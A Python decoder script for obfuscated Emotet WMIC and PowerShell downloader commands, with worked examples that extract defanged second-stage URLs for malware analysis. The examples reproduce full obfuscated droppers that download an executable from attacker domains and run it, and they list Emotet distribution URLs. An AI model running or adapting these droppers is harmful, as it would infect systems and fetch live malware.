- import re
- import sys
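def main_menu():
    """Show the format menu and dispatch to the chosen decoder.

    The choice is read from stdin; "1", "2" and "3" run wmic_format,
    new_format and old_format respectively. An unknown choice re-shows the
    menu in a loop instead of recursing, so repeated bad input can no
    longer grow the call stack.
    """
    decoders = {"1": wmic_format, "2": new_format, "3": old_format}
    while True:
        print ("1. WMIC Format \n2. PowerShell Format\n3. Array Format\n")
        menu = raw_input("Enter Choice [1-3] : ")
        decoder = decoders.get(menu)
        if decoder is not None:
            decoder()
            return
        print ("Invalid Choice")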
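def wmic_format():
    """Decode a WMIC-style one-liner built from [char] codes and print the defanged URL list.

    The command is read from stdin and only ever string-processed; nothing
    from it is executed. Every run of digits in it is treated as a candidate
    character code, codes in 30..126 are kept, and each run of three
    consecutive codes is removed from the command as a three-character junk
    string (see remove_chars). The remainder is defanged ("." -> "[.]",
    "http://" dropped) and split on "="; element 6 is shown as the likely URL
    list, array_select lets the user pick a different element, and
    extra_chars strips whatever junk is left before the final print.
    """
    command = raw_input("Enter the WMIC command\n")
    # Normalise every bracketed cast containing "char" (e.g. [cHAr],
    # [StrinG][cHAr]) to the literal "[char]" before collecting the numbers.
    codes = re.sub(r"\[.*?char.*?\]", "[char]", command, flags=re.I)
    codes = re.findall(r'\d+', codes)
    # Keep only codes in 30..126; anything outside that range is not part of
    # the obfuscation alphabet (0 is NUL, 127 is beyond the ASCII text range).
    codes = [code for code in codes if 30 <= int(code) < 127]
    # Drop the quote and "+" concatenation characters the obfuscator inserts.
    command = command.replace("'", "").replace("+", "")
    # Two passes: a junk string can only become contiguous once the first
    # pass has removed something around it.
    result = remove_chars(command, codes)
    result = remove_chars(result, codes).replace(".", "[.]").replace("http://", "")
    # Element 6 of the "="-split text is where the URL list usually lands.
    x = 6
    temp_result = result.split("=")
    if x >= len(temp_result):
        # Fewer pieces than expected: show the last one instead of raising
        # IndexError, and let the user pick the right piece below.
        x = len(temp_result) - 1
    print(temp_result[x])
    chosen = array_select(temp_result, x)
    # array_select is expected to hand back the chosen index; if it returns
    # anything else (e.g. True or None) keep the element already shown.
    if isinstance(chosen, int) and not isinstance(chosen, bool):
        x = chosen
    print(temp_result[int(x)])
    extra_chars(result, x)
    # Lets the user restart the script once the clean result is printed.
    menu_end()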
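def new_format():
    """Decode a PowerShell payload given as character codes and print the defanged pieces.

    Reads one line of character codes (the text between the 36 and the 125,
    i.e. between the "$" and the "}" of the decoded script), extracts every
    number, maps each to its character, defangs the result ("." -> "[.]",
    "http://" dropped) and prints the text split on single quotes as a list.
    """
    raw = raw_input("Enter the numbers/characters from 36 to 125\n")
    # Every run of digits is one character code; whatever separates them
    # (",", split letters, spaces) is ignored.
    codes = re.findall(r'\d+', raw)
    decoded = ''.join(chr(int(code)) for code in codes)
    pieces = decoded.replace(".", "[.]").replace("http://", "").split("'")
    # NOTE(review): the whole list is printed, although the original comment
    # said only the quoted part (index 1) was meant to be shown — confirm.
    print(pieces)
    # Lets the user restart the script once the result is printed.
    menu_end()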
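def old_format():
    """Decode the array-style payload: a quoted character list plus an index sequence.

    The first prompt takes the character values as pasted from the script
    (entries separated by "','" are split apart); the second takes the
    integer output sequence, which is split on "{" with the "}" removed, so
    "{3}{0}{1}" yields the indices 3, 0, 1. The selected values are written
    to stdout in that order with quotes removed and "." defanged to "[.]".
    """
    values = raw_input("Enter the Character Values\n").replace("','", ";").split(";")
    sequence = raw_input("Enter the Integer Array Output Sequence\n").split("{")
    # Text before the first "{" is not an index, so it is dropped.
    indices = [piece.replace('}', '') for piece in sequence[1:]]
    for piece in indices:
        # A malformed index (non-numeric or out of range) raises ValueError
        # or IndexError; the pasted payload is expected to match the format.
        sys.stdout.write(values[int(piece)].replace("'", "").replace(".", "[.]"))
    # Lets the user restart the script once the result is printed.
    menu_end()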
def remove_chars(a, wmic):
    """Remove every three-character string formed by consecutive codes in *wmic* from *a*.

    Args:
        a: The text to clean.
        wmic: Character codes as strings (e.g. ["82", "117", "106"]); each
            window of three consecutive codes is turned into a three-character
            string and all its occurrences are deleted from the text.

    Returns:
        The text with every such three-character string removed. Fewer than
        three codes leaves the text unchanged.
    """
    windows = (
        ''.join(chr(int(code)) for code in wmic[start:start + 3])
        for start in range(len(wmic) - 2)
    )
    for junk in windows:
        a = a.replace(junk, '')
    return a
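def extra_chars(result, x):
    """Interactively strip leftover junk strings and print the final URL list.

    Args:
        result: The decoded, defanged command text.
        x: Index of the "="-separated element holding the URL list.

    Loops until the user answers "n". On "y" a string to delete is read (no
    validation: an empty or absent string removes nothing), removed from the
    text together with any "http://" that becomes visible, and the selected
    element is re-printed. On "n" that element is split on "?" and printed
    one URL per line. Any other answer re-asks the question.
    """
    index = int(x)

    def selected(text):
        pieces = text.split("=")
        # Clamp rather than raise if a removal swallowed an "=" separator.
        return pieces[min(index, len(pieces) - 1)]

    while True:
        answer = raw_input("Are there any more 3 character strings to replace? (y/n)\n").lower()
        if answer.startswith('y'):
            junk = raw_input("Enter the characters to replace\n")
            result = result.replace(junk, '').replace("http://", "")
            print(selected(result))
        elif answer.startswith('n'):
            print("\n".join(selected(result).split("?")))
            return
        else:
            print ("Invalid Choice")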
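def array_select(temp_result, x):
    """Let the user confirm or change which "="-separated element holds the URLs.

    Args:
        temp_result: The decoded command split on "=".
        x: Index of the element that was just shown (6 on first use).

    Returns:
        The 0-based index the user confirmed: ``x`` itself when the first
        answer is "y", otherwise the 1-based number the user typed converted
        to a 0-based index. Unknown answers and invalid numbers re-prompt in
        a loop, so a valid index is always returned.
    """
    # Emotet has moved the URL list from element 10 to element 6, so the
    # element is confirmed with the user rather than assumed.
    while True:
        answer = raw_input("Does this array display the domains? (y/n)\n")
        if answer.startswith('y'):
            return int(x)
        if answer.startswith('n'):
            break
        print ("Invalid Choice")
    while True:
        for number, piece in enumerate(temp_result, 1):
            print(number, piece)
        entry = raw_input("What piece of the Array contains the URLs?\n")
        try:
            chosen = int(entry) - 1
            if chosen < 0:
                # Negative indices would wrap around to the end of the list.
                raise IndexError(entry)
            piece = temp_result[chosen]
        except (IndexError, ValueError):
            print("Invalid Array")
            continue
        print(piece)
        confirm = raw_input("Does this array display the domains? (y/n)\n")
        if confirm.startswith('y'):
            return chosen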
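def menu_end():
    """Offer to restart the decoder; any answer other than "1" exits the process.

    Restarting re-enters main_menu, so every decoding round nests one level
    deeper on the call stack; this mirrors the original control flow.
    """
    answer = raw_input("\n\nPress 1 to restart, any other key to quit\n")
    if answer == "1":
        main_menu()
    else:
        # sys.exit rather than the site-provided exit() builtin, which is
        # not guaranteed to exist (e.g. under python -S).
        sys.exit(0)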
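# Runs the main menu only when executed as a script, not when imported.
if __name__ == "__main__":
    main_menu()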
- ------------------------------------------------------------------------------
- An example of how this script works using the new wmic format
- 1. WMIC Format
- 2. PowerShell Format
- 3. Array Format
- Enter Choice [1-3] : 1
- Enter the WMIC command
- cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %CpPrlXwPi%=p^o^w^er&&set %ihOoOEWWJO%=^sh^ell&&!%CpPrlXwPi%!!%ihOoOEWWJO%! " (('iNvoK'+'e-ExprESsION (((sRI .sRI+sRI ((Get-VARIable KRh*MDR*KRh).name[3'+',11,2]-joInKsRI+sRIRhKRhsRI+sRI)( ((KR'+'sRI+sRIh& ( M3gENV:cOMSsRI+sRIPEC[4,26,25]-joINh'+'0Eh0E)sRI+sRI ( (hsRI+sRI0EDHyh0E+h0KRh+KRhEnsadasRI+sRIsh0E+h0Ed = &h0E+h0E(h0E'+'+h0ERujKRh+KRhnRuh0E+h0Ej+h0E+h0ERuh0E+hKRh+KRh0Ejh0E+h0Eeh0E+h0ERh0E+'+'h0Euj+Ru'+'jh0E+h0KRh+sRI+sRIKRhEw-objh0E'+'+KRh+'+'KRhh0Eeh0E+h0EcRuj+RujtRh0E+h0Euj) randomsRI'+'+sRI;DHyYYU = h0E+h0E.(RujneRuj+RujwRuj+h0E+h0ERuh0E+h0Ej-objectRh0EsRI+sRI+h0Eu'+'j) S'+'yh0E+h0Estem.Net.WebClieh0'+'E+h0Ent;DHyNSB = DHyh0E+h'+'0Ensad'+'h0E'+'+h0KRh+KRhEasdKRh+K'+'Rh.nextKRh+KRh(10000'+', '+'2821sRI+sRI'+'3'+'3);DHyADCX = Ru'+'j sRI+sRI htsRI+sRItp://tesh0E+h0Eth0E+h0E.magsRI+sRInh0E+h0EusRI+sRImsph0E+h0Eort.com'+'/k1u6dtwh0E+h0sRI+sR'+'IE/?httph0E+h0E:h0E+h0E//wwwh0'+'E'+'+hKRh+KRh0E.sbkh0E+h0Etraveh0E+hsRI+sRI0El.com.mysRI+sRI'+'h0E+s'+'RI+sRIh0E/MoGJD/?httph0E+h0E://doh0E+h0Erschdh0E'+'+h0Ei.com/ly4Ivh0E+h0E/'+'h0E+h0E?hsRI+sRI0E+h0Ehtth0E+sRI+sRIh0Ep:'+'//ww'+'w.hopadih0E+sRI+sRIhsRI+sRI0Elida.rosRI+sRI'+'/0LCh0E+sRI+sR'+'Ih0ETG2/h0E+h0E?h0E+h0Ehh0E+sRI+sRIhKRsRI+sRIh'+'+KRh0Ettp:/h0E+h0E/sph0E+h0sRI+sRIEortid.net/02wh0E+h0Edi/Ruj.h0E+h0ESplKRh+KRh'+'i'+'t(Ruj?sRI+sRIRusRI+sRIj);DHh0E+h0EySh0E'+'+h0EDh0E+h0'+'ECh'+'0E+h0'+'E = h0E+h0EDHyenh0E+h0Ev:p'+'ubh0E+h0E'+'lKRh+KRhih0E+h0Ec + Ruh0E+KRh+KRhh0KRh+KRhEjA0h0E+h0EGRuj + DHyNSB + (Rh0E+sRI+sRIh0Euj.sRI+sRIexRusRI+sRIj+Rujeh0E+h0ERuj)h0EsRI'+'+sRI+h0E;h0E+h0KRh+KRhEforeach(hsRI+sRI0E+h0EDHyah0E+h'+'0Esh0sRI+sRIE+KRh+K'+'Rhh0Efc inh0E+h0E h0E+h0EDHKRh+sRI+sRIKRhh0E+h0EyADCX)h0E+h0E{'+'trh0E+h0Eyh0E+h0E{DHyYYh0E+h0EU.Nd5DoyP4WnlyP4OasRI+sRIdFIh0E+h0EyP4leNd5(DHh0E+h0Ey'+'ah0EsRI+sRI+h0Esh0E+h0Efc.Nd5Toh0E+h0KsRI+'+'sRIRh+KRhESh0EKRh+KRh+h'+'0EtryPKRh+KRh4iyP4Nh0E+h0Egh0E+h0ENd5(), 
h0EKRsRI+sRIh+KRh+hsRI+sRI0EDHySDC);&sRI+sRI(RujInvoRuj+RujkRusRI+sRIjh0E+h0E+Ruje-Ih0E+h0Eth0E+h0EemRh0E+h0Eujh0E+hKRh+KRh0E)(DHySDC);brh0E+h'+'sR'+'I+sRI0Eeak;}catch{}}h0KRh+KRhE).replaCE(sRI+sRIh0EsRI+sRINd5h0E,[StrinG][c'+'HAr]34)'+'KRh+KRh.replaCE(h0EA0Gh0E,h0'+'E2oUh0E).replaCE(([cHArsRI+sRI]121'+'+sRI+sRI[cHAr]80+[cHAr]sRI+sRI52),[SKRh+KRhtrinG][cHAr]'+'96).replaCE(([cHAr]68+['+'cHAr]KRh+KR'+'h72+[cHAr]12KRh+KsRI+sRIRh1),[StrinG][cH'+'Ar]36).rep'+'laCE(sRI+sRI([cHAKRh+KRhr]82+[csRI+sRIHAr]'+'117+sRI+sRI[sRI+sRIcsRI+sRIHKRh+KRhAr]106),[StrinG][cHAr]39'+'KRh'+'+KRh) ) KRh) -crEpLAce ([ChAr]104+[ChAr]48+[ChAr]69)'+',[ChAr]39 -'+'crEpLAce ([ChAr]50+[ChAr]111+[ChAr]85),[ChAr]92'+' -REpLAcE([ChArsRI+sRI]77+[ChAr]5'+'1'+'+[ChAr]103),[ChAr]'+'36))sRI) -CrEPlACe ([CHAR]75+[CHA'+'R]82+[CH'+'AR]104),[CHAR]39) )')-crePlaCE([CHaR]115+[CHaR]82+[CHaR]73),[CHaR]39) |&( $PSHOme[4]+$psHome[30]+'x')
- Ruj test[.]magnumsport[.]com/k1u6dtw/?wwwhKRhKR[.]sbktravel[.]com[.]my/MoGJD/?dorschdi[.]com/ly4Iv/?www[.]hopadilida[.]ro/0LCTG2/?hhKRhKRttp://sportid[.]net/02wdi/Ruj[.]SplKRhKRhit(Ruj?Ruj);DHySDC
- Does this array display the domains?
- y
- Ruj test[.]magnumsport[.]com/k1u6dtw/?wwwhKRhKR[.]sbktravel[.]com[.]my/MoGJD/?dorschdi[.]com/ly4Iv/?www[.]hopadilida[.]ro/0LCTG2/?hhKRhKRttp://sportid[.]net/02wdi/Ruj[.]SplKRhKRhit(Ruj?Ruj);DHySDC
- Are there any more 3 character strings to replace? (y/n)
- y
- Enter the characters to replace
- Ruj
- test[.]magnumsport[.]com/k1u6dtw/?wwwhKRhKR[.]sbktravel[.]com[.]my/MoGJD/?dorschdi[.]com/ly4Iv/?www[.]hopadilida[.]ro/0LCTG2/?hhKRhKRttp://sportid[.]net/02wdi/[.]SplKRhKRhit(?);DHySDC
- Are there any more 3 character strings to replace? (y/n)
- y
- Enter the characters to replace
- hKR
- test[.]magnumsport[.]com/k1u6dtw/?www[.]sbktravel[.]com[.]my/MoGJD/?dorschdi[.]com/ly4Iv/?www[.]hopadilida[.]ro/0LCTG2/?sportid[.]net/02wdi/[.]SplKRhit(?);DHySDC
- Are there any more 3 character strings to replace? (y/n)
- y
- Enter the characters to replace
- KRh
- test[.]magnumsport[.]com/k1u6dtw/?www[.]sbktravel[.]com[.]my/MoGJD/?dorschdi[.]com/ly4Iv/?www[.]hopadilida[.]ro/0LCTG2/?sportid[.]net/02wdi/[.]Split(?);DHySDC
- Are there any more 3 character strings to replace? (y/n)
- n
- test[.]magnumsport[.]com/k1u6dtw/
- www[.]sbktravel[.]com[.]my/MoGJD/
- dorschdi[.]com/ly4Iv/
- www[.]hopadilida[.]ro/0LCTG2/
- sportid[.]net/02wdi/[.]Split(
- );DHySDC
- An example of how this script works using the Join format
- https://www.hybrid-analysis.com/sample/4cfd3f25f178f5ae5dd5c5438a4bc3cd0af2ca712a5a59388612697d4b4424d4?environmentId=100
- Base64-decoding it and removing the NUL characters gives this output:
- & ( $eNv:PubLIc[13]+$eNV:puBLic[5]+'X')( ( '36q119:115~99~114x105z112~116;32z61x32J110q101&119q45z111J98&106x101z99~116G32~45%67%111x109q79q98;106%101:99&116x32x87q83%99z114x105J112:116x46:83x104q101:108x108z59J36G119J101z98z99%108%105&101x110~116J32:61z32~110z101q119;45:111J98x106%101:99%116%32z83G121&115q116%101~109G46G78J101q116~46z87:101~98J67z108~105z101;110q116q59~36x114:97;110;100G111q109x32q61&32z110%101;119J45J111%98J106~101%99&116z32q114x97&110&100%111%109J59G36&117:114~108G115~32%61;32q39~104~116G116z112%58~47~47~98q97J103:112:114&105&110%116~101q114G46z99&111x109;47q105x47q44%104:116;116z112%58G47%47x98;114&111:97J100~97z118:101J110%117J101G46~99&111&109:46G97&117&47:67z82x47G44J104%116q116q112G58J47q47:115z112:121%114q97:108G119:101G98&46:99&111G109J47J105~110&118z97;114q47q110;107;108;79G105J77;47%44:104x116G116~112~58;47J47z102:99;116&100x101;118:46x99z111q109:47&120G98G117G121x88z47q44x104G116x116J112%58x47q47z99;98%111J120z46:100%107G47%118&85J83x106J65%122G86q71J114J47:39&46z83:112z108;105~116&40:39q44J39z41~59z36J110G97J109x101z32q61G32z36;114J97q110:100%111z109:46q110J101z120x116x40q49;44G32:54%53&53z51%54~41~59;36&112%97%116q104~32z61G32q36J101z110G118~58G116:101%109&112%32%43~32G39:92&39q32z43G32G36:110:97&109~101x32q43x32;39&46%101:120G101~39~59~102;111;114G101q97x99G104x40:36~117G114z108z32~105%110q32J36z117%114G108:115x41z123z116J114G121J123q36x119J101G98&99G108J105G101;110~116x46%68~111&119:110q108;111q97z100%70%105x108G101z40~36G117%114;108;46G84J111:83J116%114&105&110x103G40x41&44&32q36G112:97z116~104z41q59~83%116~97&114G116q45G80;114z111;99~101z115q115q32:36&112z97&116x104~59;98J114:101G97%107&59&125:99~97J116x99z104z123G119q114J105%116~101G45x104~111z115J116%32x36J95z46~69%120%99&101z112q116x105z111J110z46;77&101&115x115x97q103z101&59J125z125'-split'z' -SplIT'x' -sPLIT':' -SpLit'J' -sPLiT '&' -sPLIT';' -SplIT'%' -sPLIT '~'-SpLiT'q'-Split'G'|fOREacH-OBjecT {([char][iNT] $_) }) -jOIN '' )
- Type 1 for New format
- Paste from the 36 up to the 125, before the split (do not include the surrounding ' characters)
- The script will produce this output:
- bagprinter[.]com/i/,broadavenue[.]com[.]au/CR/,spyralweb[.]com/invar/nklOiM/,fctdev[.]com/xbuyX/,cbox[.]dk/vUSjAzVGr/
- These are the new second-stage domains for the Emotet domains.
- This second example shows numbers only
- https://www.hybrid-analysis.com/sample/0c34b872ba2266c2028e27c9fc9bed8fe9c6f04221695e19c5194200a9638d6e?environmentId=100
- Base64-decoding it and removing the NUL characters gives this output:
- [CHar[]] (36, 119 , 115 , 99, 114, 105, 112,116,32, 61 ,32 , 110, 101 , 119 ,45,111, 98 ,106, 101 ,99 , 116,32 ,45, 67 ,111 , 109 , 79 ,98, 106 , 101 , 99 ,116,32,87,83,99 , 114 , 105 , 112 ,116, 46 ,83 , 104, 101 ,108 , 108 ,59, 36, 119 , 101 , 98, 99,108, 105 , 101 , 110 ,116, 32, 61 , 32, 110, 101,119, 45 ,111,98 ,106, 101 ,99 ,116,32 ,83,121 , 115 , 116 , 101,109 ,46 , 78 , 101 , 116, 46, 87 ,101, 98 ,67 ,108, 105,101, 110,116 , 59,36 ,114, 97 , 110 , 100 , 111,109,32,61, 32, 110,101 ,119 , 45,111 , 98 ,106 ,101 ,99 , 116 , 32,114, 97,110 ,100 ,111 , 109 , 59 , 36,117 , 114 ,108 ,115 ,32 ,61 , 32 ,39,104 , 116 ,116 ,112 ,58,47 ,47 , 103,97 , 109 ,109 , 101 ,108 , 103 ,114, 97, 118, 108, 105 ,110, 103 , 101 , 110, 46 ,99 , 111,109, 47,100 , 108, 84 ,77 ,104,47,44 , 104,116,116 , 112 , 58,47 , 47,97,99,101 , 106 , 97, 112, 97 , 110 , 46 ,110 , 101 ,116 , 47,98, 121 ,103 ,47 , 44 ,104,116 , 116 , 112, 58 , 47 , 47 ,70 , 108 ,111 , 114,105 ,115 ,115 ,97 ,110 , 116 , 70 , 105, 114, 101 ,46,99,111 ,109,47 ,97, 115, 112,110 ,101,116 ,95,99, 108 , 105 , 101 , 110 ,116, 47,71,99,99 ,119, 117, 111 ,102, 47, 44,104 ,116, 116,112 ,58,47,47 , 101,116,101,114 , 110, 97,108 ,97,109 ,111 , 117, 114 ,46, 99 , 111 , 109,47 ,66, 73 , 72,103 , 47,44 ,104, 116 ,116 ,112,58, 47,47,98 ,97,99, 104,117, 101 , 46,99 , 111,46 , 117 , 107 , 47 , 81, 74 ,47, 39,46 , 83, 112 ,108 , 105, 116 , 40,39 , 44 , 39 , 41,59 , 36, 110 ,97 ,109 , 101 ,32 ,61,32, 36 , 114 , 97, 110, 100 , 111 ,109 , 46,110 ,101 ,120 ,116 ,40 ,49, 44, 32,54 , 53, 53 , 51 ,54 ,41 ,59 , 36 ,112 , 97 ,116 ,104 , 32 ,61, 32 ,36,101,110 , 118, 58 ,116 , 101 ,109, 112 , 32 , 43, 32 , 39 , 92 , 39,32,43,32 , 36 ,110, 97 , 109,101 ,32 ,43, 32,39, 46, 101 ,120 ,101, 39 , 59, 102,111 ,114, 101,97 ,99, 104 ,40, 36 ,117, 114 ,108, 32,105 ,110 , 32 ,36, 117 ,114 , 108,115 , 41,123, 116 , 114 , 121 , 123 , 36 ,119 , 101,98 , 99,108 ,105 ,101,110 ,116 ,46 ,68 , 111 , 119 ,110, 108,111,97 , 100 ,70 , 105, 108 ,101 ,40 , 36 ,117 , 
114 , 108 ,46 ,84,111,83 , 116 , 114, 105, 110 , 103 ,40 ,41, 44, 32 ,36,112, 97, 116 , 104 ,41 ,59 , 83 , 116 , 97, 114, 116 ,45,80 ,114,111, 99 , 101 ,115 , 115, 32 ,36,112, 97,116 ,104 , 59,98 , 114 , 101, 97,107 ,59 , 125, 99 ,97 ,116,99 , 104 , 123 ,119, 114 , 105 , 116 ,101 ,45,104,111 , 115 ,116 ,32,36, 95, 46 , 69 ,120 ,99 , 101,112, 116 , 105 ,111 ,110 ,46, 77 , 101 , 115 ,115 ,97 , 103,101, 59, 125, 125) -JoIN''| &( $shelliD[1]+$ShELlid[13]+'x')
- Type 1 for New Format
- Paste from the 36 up to the 125 (do not include the parentheses)
- The script will produce this output:
- gammelgravlingen[.]com/dlTMh/,acejapan[.]net/byg/,FlorissantFire[.]com/aspnet_client/Gccwuof/,eternalamour[.]com/BIHg/,bachue[.]co[.]uk/QJ/
- These are the new second-stage domains for the Emotet domains.